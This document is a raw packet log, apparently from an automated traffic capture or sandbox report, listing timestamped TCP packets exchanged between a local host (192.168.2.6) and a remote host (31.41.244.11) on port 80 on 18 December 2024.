                                                                                                                                                                  Dec 18, 2024 11:09:29.103529930 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.104571104 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.104582071 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.104592085 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.104619026 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.104619026 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.106420994 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.106431961 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.106447935 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.106462002 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.106462002 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.106487989 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.107651949 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.107662916 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.107673883 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.107692003 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.109391928 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.109402895 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.109414101 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.109438896 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.109438896 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.109500885 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.109522104 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.109961033 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.111356974 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.111366987 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.111377001 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.111432076 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.111432076 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.111834049 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.112040997 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.112477064 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.112488985 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.112692118 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.113326073 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.114206076 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.114233017 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.114286900 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.114326000 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.114326000 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.114401102 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.114473104 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.115257025 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.115338087 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.115370989 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.115410089 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.116286993 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.116353989 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.116383076 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.116496086 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.117279053 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.118293047 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.118303061 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.118313074 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.118315935 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.118350983 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.118350983 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.119378090 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.119389057 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.119421005 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.121195078 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.121205091 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.121216059 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.121258974 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.121258974 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.121527910 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.121572018 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.123020887 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.123034000 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.123068094 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.123336077 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.123368025 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.123379946 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.124619007 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.124656916 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.124667883 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.124696970 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.126190901 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.126202106 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.126211882 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.126254082 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.126254082 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.127118111 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.127129078 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.127140045 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.127187967 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.127187967 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.129070044 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.129102945 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.129118919 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.129137039 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.129172087 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.129173040 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.129173040 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.130203962 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.130269051 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.130306005 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.130322933 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.130506992 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.131167889 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.131202936 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.131220102 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.131351948 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.133013964 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.133050919 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.133068085 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.133084059 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.133126974 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.133126974 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.133497000 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.134620905 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.134702921 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.134738922 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.134780884 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.134780884 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.135418892 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.135477066 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.135524035 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.135524035 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.136897087 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.136924982 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.136934996 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.136998892 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.136998892 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.137973070 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.137984991 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.137995005 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.138020992 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.138259888 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.138909101 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.138953924 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.139154911 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.139329910 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.140824080 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.140836000 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.140847921 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.140871048 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.141944885 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.141956091 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.141972065 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.141989946 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.141989946 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.142148018 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.143382072 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.143394947 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.143426895 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.144742966 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.144752979 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.144764900 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.144804001 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.144804001 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.145824909 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.145836115 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.145845890 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.145873070 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.147361994 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.147394896 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.147408009 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.147484064 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.148833990 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.148844957 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.148854971 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.148883104 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.149745941 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.149765015 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.149768114 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.149781942 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.149802923 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.149804115 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.150150061 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.150751114 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.150789976 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.151366949 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.151406050 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.151566029 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.153511047 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.291395903 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.291413069 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.291446924 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.291486979 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.292629004 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.292644024 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.292685032 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.293215036 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.293230057 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.293242931 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.293260098 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.293260098 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.293656111 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.294538021 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.294553041 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.294595957 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.295084953 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.295097113 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.295110941 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.295336008 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.296050072 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.296065092 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.296094894 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.296788931 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.297545910 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.297561884 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.297594070 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.297859907 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.298226118 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.298239946 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.298274994 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.299067974 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.299081087 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.299109936 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.299348116 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.300458908 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.300476074 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.300504923 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.300853968 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.300889969 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.300889969 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.301960945 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.301975012 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.301992893 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.302016020 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.302016020 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.303343058 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.303379059 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.303392887 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.303421974 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.303486109 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.304544926 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.304591894 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.308749914 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.308763981 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.308775902 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.308789968 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.309433937 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.309489012 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.309582949 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.309767962 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.309802055 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.309839964 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.309874058 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.310684919 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.310739994 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.310769081 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.310802937 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.311641932 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.311706066 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.311747074 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.311913967 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.312796116 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.312808990 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.312839031 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.312882900 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.314395905 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.314409018 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.314451933 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.314613104 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.314661026 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.314672947 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.314719915 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.314719915 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.315582991 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.315619946 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.315818071 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.315902948 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.316730976 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.316747904 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.316766977 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.317183018 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.317533016 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.317584991 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.317816973 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.317874908 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.318679094 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.318778992 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.318798065 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.318866014 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.319662094 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.319699049 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.319803953 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.319842100 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.320512056 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.320548058 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.320624113 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.320658922 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.321840048 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.321856022 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.321876049 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.321899891 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.322767019 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.322782040 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.322801113 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.322822094 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.323549032 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.323564053 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.323584080 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.323613882 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.324652910 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.324667931 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:29.324722052 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:29.324722052 CET4991280192.168.2.631.41.244.11
